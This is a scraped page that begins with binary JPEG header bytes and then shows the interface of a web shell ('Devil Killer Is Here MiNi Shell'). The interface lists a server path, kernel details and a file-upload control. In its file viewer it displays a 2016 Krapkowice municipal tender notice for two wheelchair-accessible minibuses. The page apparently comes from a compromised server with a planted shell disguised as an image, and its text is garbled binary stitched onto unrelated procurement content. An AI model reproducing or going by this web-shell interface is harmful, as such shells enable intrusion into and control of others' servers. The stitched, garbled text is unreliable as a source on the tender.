JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20161212/364270-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.krapkowice.pl' target='_blank'>http://www.bip.krapkowice.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 364270 - 2016
              z dnia 2016-12-12 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Krapkowice: Dostawa samochodów typu mikrobus do przewozu osób niepełnosprawnych.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Krapkowice, krajowy numer identyfikacyjny
              53141309900000, ul.
              ul. 3 Maja 
              17,
              47303  
              Krapkowice, woj.
              opolskie, państwo
              Polska, tel.
              774 466 800, e-mail
              umig_przetargi@krapkowice.pl, faks
              774 466 888.
              <br />
              Adres strony internetowej (URL): www.krapkowice.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.krapkowice.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.krapkowice.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />osobiście, za pośrednictwem operatora pocztowego, kurierem<br />
                Adres:
                <br />Urząd Miasta i Gminy w Krapkowicach, ul. 3 Maja 17, 47-303 Krapkowice</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa samochodów typu mikrobus do przewozu osób niepełnosprawnych.<br /><b>Numer referencyjny: </b>PiRG.271.1.16.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa 2 szt. 9-cio (8+1) miejscowych  samochodów osobowych typu mikrobus przystosowanych do przewozu osób niepełnosprawnych, w tym dwóch osób  na wózkach inwalidzkich, o masie całkowitej do 3,5 t. 
Pojazd winien być dostosowany do eksploatacji we wszystkich porach roku oraz przechowywania na wolnym powietrzu.
Przedmiot zamówienia został podzielony na dwa zadania.

<br /><br /><b>II.5) Główny kod CPV: </b>34110000-1<br /><b> Dodatkowe kody CPV:</b>34115200-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 22/02/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                   Dostawca musi posiadać doświadczenie polegające na wykonaniu (zakończeniu)
   w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres 
   prowadzenia działalności jest krótszy  w tym okresie, min. 1 dostawy samochodu 
   przystosowanego do przewozu osób niepełnosprawnych  odpowiadającego przedmiotowi 
   niniejszego zamówienia ,o wartości min. 100 000,00 zł 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy. W przypadku składania oferty wspólnej dokument należy złożyć dla każdego partnera z osobna. </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz wykonanych dostaw , w  przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie , wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane wraz z dowodami określającymi czy te dostawy zostały wykonane lub są wykonywane należycie.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W przypadku osoby upoważnionej do podpisania oferty upoważnienie (pełnomocnictwo rodzajowe) powinno być dołączone do oferty o ile nie wynika to z innych dokumentów załączonych przez wykonawcę.                                                                                                                                                                                                                                                                                                                                                                                                        
      Upoważnienie (pełnomocnictwo) powinno być przedstawione w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zamawiający przewiduje możliwość wprowadzenia istotnych zmian postanowień   
         zawartej umowy w stosunku do treści oferty na podstawie której, dokona się wyboru:  
         a) gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie   
            mającym wpływ na realizację przedmiotu umowy, w tym podatku VAT - wówczas 
           dostawca otrzyma wynagrodzenie liczone od wartości netto, określonej w ofercie, 
           powiększone o VAT  w aktualnej wysokości,
         b) w zakresie terminu wykonania przedmiotu umowy, gdy wykonanie przedmiotu  
           umowy w terminie określonym w § 2 jest niemożliwe wskutek działania siły 
           wyższej, o okres działania siły wyższej oraz o okres niezbędny do usunięcia 
           skutków działania siły wyższej, lub innych obiektywnych a niezawinionych 
           przez Dostawcę przyczyn, jednakże pod warunkiem, że instytucja 
           współfinansująca zakup samochodu w ramach  programu pn. Program 
           wyrównywania różnic między regionami III wyrazi zgodę na zmianę terminu 
           jego realizacji.
       c)   zmiany podwykonawcy, wykazanego na etapie postępowania o udzielenie 
           zamówienia publicznego i wykazanego na Formularzu ofertowym, a jednocześnie 
           będącego pomiotem, na którego zasoby Dostawca powołał się na zasadach 
           określonych w art. 22a ustawy, w celu wykazania spełnienia warunków 
            udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, jeśli   
            Dostawca wykaże Zamawiającemu, iż proponowany inny podwykonawca lub 
            Dostawca  samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie 
             mniejszym niż  wymagane w trakcie przedmiotowego postępowania o udzielenie 
            zamówienia  publicznego.
    2. Zmiany do umowy będą ponadto możliwe, w przypadku zaistnienia którejkolwiek
         okoliczności, o której mowa w art. 144 ust.1 pkt 2-6 ustawy, przy spełnieniu wymogów 
         określonych odpowiednio w ust 1a i 1b art.144 ustawy.

       Zmiany do umowy muszą być dokonane w formie pisemnej aneksem do umowy pod 
       rygorem nieważności.   

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
